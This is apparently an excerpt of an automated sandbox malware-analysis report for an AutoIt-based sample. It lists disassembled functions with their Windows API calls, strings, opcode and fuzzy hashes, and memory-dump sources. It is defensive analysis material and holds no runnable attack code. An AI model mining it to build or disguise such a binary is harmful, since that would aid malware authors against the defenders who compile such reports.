                                        • Opcode Fuzzy Hash: b4365809a627a25345f2a073af5bcedd5f632dfe2a96a155ccbf7b495d6297b5
                                        • Instruction Fuzzy Hash: 2031953160070AEBDB248F98D989BEEBFF6EF05350F280019E985971A0D7B89944CF60
                                        Function 007C6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                                        Download Yara Rule
                                        APIs
                                        • __snwprintf.LIBCMT ref: 007C6BDD
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __snwprintf_memmove
                                        • String ID: , $$AUTOITCALLVARIABLE%d
                                        • API String ID: 3506404897-2584243854
                                        • Opcode ID: 82e28b97de2d83e14ffde60f099c2cacc81bb55ba020655f274339acea2d88b8
                                        • Instruction ID: 3d46e22817f956b126499f90ffa197aa0a98379f352a1a215913c89b009490c7
                                        • Opcode Fuzzy Hash: 82e28b97de2d83e14ffde60f099c2cacc81bb55ba020655f274339acea2d88b8
                                        • Instruction Fuzzy Hash: DA21AE31600218EACF11EF94C886FAE77B5EF44740F004468F659E7282DA78EA41DBA1
                                        Function 007D91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 007D9269
                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D9274
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID: Combobox
                                        • API String ID: 3850602802-2096851135
                                        • Opcode ID: 9e9f7d81244a086a73fa529380ab90041844e22ca92bf9a4a5249e92a7918567
                                        • Instruction ID: 4ccda5515fb376a76fa97fabbb70514ada4691069b3e9a6328e89e09223e614b
                                        • Opcode Fuzzy Hash: 9e9f7d81244a086a73fa529380ab90041844e22ca92bf9a4a5249e92a7918567
                                        • Instruction Fuzzy Hash: 4B119371300108BFEF119E54DC80EAB777AFB893A4F104526FA1897390D639EC518BA0
                                        Function 007D970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0078C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0078C657
                                          • Part of subcall function 0078C619: GetStockObject.GDI32(00000011), ref: 0078C66B
                                          • Part of subcall function 0078C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0078C675
                                        • GetWindowRect.USER32(00000000,?), ref: 007D9775
                                        • GetSysColor.USER32(00000012), ref: 007D978F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Window$ColorCreateMessageObjectRectSendStock
                                        • String ID: static
                                        • API String ID: 1983116058-2160076837
                                        • Opcode ID: a143aff3ad618c6077450115f701b326c58d918dea01a80a964c1f19891a2a98
                                        • Instruction ID: 1a35d1f4cb2c882d874d594964da0d13c4c40a6c2ca859f51e3b7aa06f49956b
                                        • Opcode Fuzzy Hash: a143aff3ad618c6077450115f701b326c58d918dea01a80a964c1f19891a2a98
                                        • Instruction Fuzzy Hash: 3F112C72520209AFDF05DFB8D849EEA7BB8FB08354F004529FA55D3240E639E851DB50
                                        Function 007D9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetWindowTextLengthW.USER32(00000000), ref: 007D94A6
                                        • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 007D94B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: LengthMessageSendTextWindow
                                        • String ID: edit
                                        • API String ID: 2978978980-2167791130
                                        • Opcode ID: 84a0335fbb7146f808ab754b3a3baa5573afdec1147823f7b61a7c132b140275
                                        • Instruction ID: baa601897a4559fcd51a9bfbc4615341a812485a45eb10b8d9c6c4669d0d8423
                                        • Opcode Fuzzy Hash: 84a0335fbb7146f808ab754b3a3baa5573afdec1147823f7b61a7c132b140275
                                        • Instruction Fuzzy Hash: 18116D71100244AFEB119EA4DC84AFB377AEB05378F108726FA65972D1C679DC529B60
                                        Function 007C53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 007C544C
                                        • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 007C5475
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Internet$OpenOption
                                        • String ID: <local>
                                        • API String ID: 942729171-4266983199
                                        • Opcode ID: 569847fd082ef5ce6cdc01dc99e4ca69d11fff971b0a20637b4202f800e92363
                                        • Instruction ID: 34e04a6b8eff29d5df77a68bcec83fe8f58fecae3297040d5916142bd6a2cb91
                                        • Opcode Fuzzy Hash: 569847fd082ef5ce6cdc01dc99e4ca69d11fff971b0a20637b4202f800e92363
                                        • Instruction Fuzzy Hash: 86119E70141AA1BADB298F518C84FFBFBA8FF12752F10822EF54596040E3796AC0C6B0
                                        Function 007CACD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: htonsinet_addr
                                        • String ID: 255.255.255.255
                                        • API String ID: 3832099526-2422070025
                                        • Opcode ID: 1973925f7f426583a21374657c89157a10547695e229341f0b53503650e942bd
                                        • Instruction ID: 059cf48287581e4a7e9a3a81d98763245c39b08c817a6ea9da36ebef2633af7f
                                        • Opcode Fuzzy Hash: 1973925f7f426583a21374657c89157a10547695e229341f0b53503650e942bd
                                        • Instruction Fuzzy Hash: A001D274200209ABCB20AFA4C846FADB364FF4872AF20851EF5169B6D1D679EC04C766
                                        Function 007AC577 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 007AC5E5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: 50f72201a39b8e8709f228a1050134db1ce2591b31c3a5fa663cf9bec59a3438
                                        • Instruction ID: 1e79db34cd41054f1a3582f8f4864ffce4d6f562ffe511a258e8334a82ffe13c
                                        • Opcode Fuzzy Hash: 50f72201a39b8e8709f228a1050134db1ce2591b31c3a5fa663cf9bec59a3438
                                        • Instruction Fuzzy Hash: 3C01F531601228FBCB0AEBA8CC569FE3369AB873507144718F473E72C1DA3868188750
                                        Function 007BC4D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __fread_nolock_memmove
                                        • String ID: EA06
                                        • API String ID: 1988441806-3962188686
                                        • Opcode ID: c3064832c22cbd555ed43a92a8698af9f010629b64630c8e29b0888e395e0bd5
                                        • Instruction ID: 73794f55c817479a5aba1a2fd013450edbeccd49f2d461aeac56c94f731e3f11
                                        • Opcode Fuzzy Hash: c3064832c22cbd555ed43a92a8698af9f010629b64630c8e29b0888e395e0bd5
                                        • Instruction Fuzzy Hash: 4301F572900258BEDB28D7A8D85AFFE7BF89B05311F00815AE193D2181E4B8A7088B60
                                        Function 007AC473 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000180,00000000,?), ref: 007AC4E1
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: a9ac92bc2e99ddf7fd582b69082f7aa35534523be752e557e829e3c503737e90
                                        • Instruction ID: 78c4c60d72868d148a1a84c82e9168b51166cef99813defdb4724722be935b21
                                        • Opcode Fuzzy Hash: a9ac92bc2e99ddf7fd582b69082f7aa35534523be752e557e829e3c503737e90
                                        • Instruction Fuzzy Hash: 5A01DF71641118FBCB06EBA4C967AFF37A89B8A340F148129E503E32C1DA5C5E0892A5
                                        Function 007AC4F6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48windowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 0077CAEE: _memmove.LIBCMT ref: 0077CB2F
                                        • SendMessageW.USER32(?,00000182,?,00000000), ref: 007AC562
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: MessageSend_memmove
                                        • String ID: ComboBox$ListBox
                                        • API String ID: 1456604079-1403004172
                                        • Opcode ID: 9e8b53b615b6ff9dfed071bc1b4cb20721241901cf19cb9d87bde994b51ab22e
                                        • Instruction ID: d2681ed8a9e429a319fed7d27e2d1cde1e018b49fa485ef25456fbee172db0da
                                        • Opcode Fuzzy Hash: 9e8b53b615b6ff9dfed071bc1b4cb20721241901cf19cb9d87bde994b51ab22e
                                        • Instruction Fuzzy Hash: D501F271A00118BBCB02EBA4C903EFF33AC9B12741F248214F403F32C1DA5C9E189271
                                        Function 007B804C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: ClassName_wcscmp
                                        • String ID: #32770
                                        • API String ID: 2292705959-463685578
                                        • Opcode ID: cf7abe850bb6bf8c1ae48be0aed63141504d1462d7ec0d5eb1dc38c63f48e40e
                                        • Instruction ID: d1b828e4527589b4b2f9effd4e2f9494ccc9dd06598e0005179806d88b995b0c
                                        • Opcode Fuzzy Hash: cf7abe850bb6bf8c1ae48be0aed63141504d1462d7ec0d5eb1dc38c63f48e40e
                                        • Instruction Fuzzy Hash: 1DE0D83360022967D720EBA5AC0AFD7FBBCFB517A4F000026F924E3181D6789A85C7D4
                                        Function 0079DA03 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __umatherr.LIBCMT ref: 0079DA2A
                                          • Part of subcall function 0079DD86: __ctrlfp.LIBCMT ref: 0079DDE5
                                        • __ctrlfp.LIBCMT ref: 0079DA47
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: __ctrlfp$__umatherr
                                        • String ID: xn~
                                        • API String ID: 219961500-3915447016
                                        • Opcode ID: db59c922e04545948a4cd1e62fcf0f588025aa121cdd0c6c9c7bfef8a2ea3753
                                        • Instruction ID: 54b767fe825c5e495c6e4200778408dc8012b161cc9612b2cb7ad26cff47d761
                                        • Opcode Fuzzy Hash: db59c922e04545948a4cd1e62fcf0f588025aa121cdd0c6c9c7bfef8a2ea3753
                                        • Instruction Fuzzy Hash: 14E0927140860EEEDF117F80F80A6A97BA5FF04310F808095F98C150A6DFB689B4D767
                                        Function 007AB35D Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 007AB36B
                                          • Part of subcall function 00792011: _doexit.LIBCMT ref: 0079201B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: Message_doexit
                                        • String ID: AutoIt$Error allocating memory.
                                        • API String ID: 1993061046-4017498283
                                        • Opcode ID: 20eb12f6396765c35f7ca825c1be5279ef8cf649a216f19cea0057d85571b1ff
                                        • Instruction ID: d0f278a3ac5dd22281ea738fa8ec1d7067497ae36fe673360c631e1bc8279361
                                        • Opcode Fuzzy Hash: 20eb12f6396765c35f7ca825c1be5279ef8cf649a216f19cea0057d85571b1ff
                                        • Instruction Fuzzy Hash: 9BD0123138431872D61572A87C1FFD976889F05B91F014015BF08962C38ADD98D091D9
                                        Function 007EBC74 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetSystemDirectoryW.KERNEL32(?), ref: 007EBAB8
                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007EBCAB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: DirectoryFreeLibrarySystem
                                        • String ID: WIN_XPe
                                        • API String ID: 510247158-3257408948
                                        • Opcode ID: 359194ccd1be9442259b87529c8b37ebcad0b0fb2f1db3f52aead615c32af6e4
                                        • Instruction ID: 61c6132bc79afe59b6a839ef31c6f84a70a51092b92f93013ef9172106bc4f2b
                                        • Opcode Fuzzy Hash: 359194ccd1be9442259b87529c8b37ebcad0b0fb2f1db3f52aead615c32af6e4
                                        • Instruction Fuzzy Hash: 25E0C970C0514DEFCF15DBA9D889AEDBBB9BB4C300F14C496E022B2150C7799A44DF25
                                        Function 007D84C9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D84DF
                                        • PostMessageW.USER32(00000000), ref: 007D84E6
                                          • Part of subcall function 007B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000082A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000084C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.00000000008D4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415003312.00000000008DA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3415045668.00000000008DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_770000_MSI77F6.jbxd
                                        Similarity
                                        • API ID: FindMessagePostSleepWindow
                                        • String ID: Shell_TrayWnd
                                        • API String ID: 529655941-2988720461
                                        • Opcode ID: e228c7997fa9b5f2cc4ae504c5fff9137437e20760cd7d28cc67a24a570504f4
                                        • Instruction ID: 7211feef86867cfbde88c3748a920af6a5ba6896623257d7a0fcdaf243e15993
                                        • Opcode Fuzzy Hash: e228c7997fa9b5f2cc4ae504c5fff9137437e20760cd7d28cc67a24a570504f4
                                        • Instruction Fuzzy Hash: 69D0A73138031077E77063309C0FFD66648E714B01F0009147205EA1C0C8A8B800C624
                                        Function 007D8495 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 007D849F
                                        • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 007D84B2
                                          • Part of subcall function 007B8355: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 007B83CD
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.3414588859.0000000000771000.00000040.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                        • Associated: 00000003.00000002.3414495168.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000003.00000002.3414588859.000000000081E000.00000040.00000001.01000000.00000003.sdmpDownload File
